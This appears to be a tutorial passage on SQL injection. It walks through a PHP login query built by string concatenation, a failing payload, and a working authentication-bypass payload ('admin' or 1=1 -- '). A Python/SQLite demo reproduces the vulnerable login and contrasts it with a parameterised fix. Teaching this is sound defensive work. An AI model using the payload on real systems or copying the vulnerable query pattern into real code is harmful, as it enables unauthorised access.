Code:
$query = "select * from user where username='".$_POST['user']."' AND password='".md5($_POST['pass'])."'";
So on this page the query string is complete, with the quotes in place so that it does not throw an error. The page works like this: the user submits a form, the database checks the input first, and if a row matches both the username and the password hash the next page is shown; if nothing matches, the page stays as it was, with no message.
So, with the username admin' OR 1=1 the query becomes:
Code:
$query = "select * from user where username='admin' OR 1=1' AND password='".md5($_POST['pass'])."'";
What happens? The query fails with a syntax error because of the extra quotation mark (see item 1 above), so of course nothing true comes back and the login automatically fails. To get around this we need to cut the rest of the query off, using the MySQL comment sequence: -- (two hyphens followed by a space; MySQL only treats -- as a comment when it is followed by whitespace, so the trailing space matters).
Thus, the username we submit is: admin' or 1=1 -- (including the trailing space)
Code:
$query = "select * from user where username='admin' or 1=1 -- ' AND password='".md5($_POST['pass'])."'";
Everything after -- is ignored by MySQL, so the WHERE clause reduces to username='admin' or 1=1, which is true for every row; the password check is never evaluated, the query returns rows, and the login succeeds.
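The three cases above (normal login, the quote-only payload that breaks the query, and the quote-plus-comment payload that bypasses the password check) can be reproduced offline. The following is an added example written for this page, not code from the original post: it models the PHP string concatenation in Python against an in-memory SQLite database, with a constructed user table holding one account (username admin, password s3cret, stored as MD5 like the page's PHP). It also shows the parameterised query that closes the hole. One caveat: SQLite accepts -- as a comment without the trailing space, whereas MySQL requires it, so the payload keeps the space as described above.

```python
import hashlib
import sqlite3


def build_query(user: str, password: str) -> str:
    """Vulnerable query construction, mirroring the PHP concatenation on the page."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    return (
        "select * from user where username='" + user
        + "' AND password='" + pw_hash + "'"
    )


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one account with an MD5-hashed password (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table user (id integer primary key, username text, password text)"
    )
    conn.execute(
        "insert into user (username, password) values (?, ?)",
        ("admin", hashlib.md5(b"s3cret").hexdigest()),
    )
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, user: str, password: str) -> str:
    """'ok' if a row comes back, 'fail' if none, 'error' if the SQL no longer parses."""
    try:
        rows = conn.execute(build_query(user, password)).fetchall()
    except sqlite3.OperationalError:
        # The stray quote from a payload like  admin' OR 1=1  ends up here.
        return "error"
    return "ok" if rows else "fail"


def safe_login(conn: sqlite3.Connection, user: str, password: str) -> str:
    """Same check with bound parameters: the input is data, never SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    rows = conn.execute(
        "select * from user where username=? AND password=?", (user, pw_hash)
    ).fetchall()
    return "ok" if rows else "fail"


def run_cases() -> dict:
    """Run each input through both logins; returns {case: (vulnerable, safe)}."""
    conn = make_db()
    cases = {
        "valid": ("admin", "s3cret"),
        "wrong_pass": ("admin", "guess"),
        # extra quote, no comment: query breaks, login fails
        "quote_only": ("admin' OR 1=1", "guess"),
        # comment swallows the password clause: login bypassed
        "quote_comment": ("admin' or 1=1 -- ", "guess"),
    }
    return {
        name: (vulnerable_login(conn, u, p), safe_login(conn, u, p))
        for name, (u, p) in cases.items()
    }


if __name__ == "__main__":
    for name, (vuln, safe) in run_cases().items():
        print(f"{name:14s} vulnerable={vuln:6s} parameterised={safe}")
```

Running it shows the quote-only payload producing "error" (the syntax error the page describes), the quote-plus-comment payload producing "ok" from the concatenated query with a wrong password, and the parameterised version failing both payloads because the whole input is compared as a username.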
So, in principle, the difference between SQL injection and blind SQL injection is not the payload but the kind of feedback the vulnerable query gives back: with an ordinary injection you can read query results or error messages, while with a blind injection, as on this login page, the only signal is whether the page changes or stays silent.